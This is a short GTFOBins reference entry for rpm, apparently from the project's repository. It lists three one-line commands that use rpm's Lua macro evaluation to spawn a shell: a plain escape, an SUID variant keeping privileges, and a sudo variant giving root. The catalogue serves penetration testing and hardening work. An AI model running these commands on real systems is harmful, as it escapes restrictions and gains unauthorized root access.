GTFOBins.github.io/_gtfobins/rpm.md
2018-10-05 18:55:38 +01:00

10 lines
219 B
Markdown

---
functions:
shell:
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
suid:
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
sudo:
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
---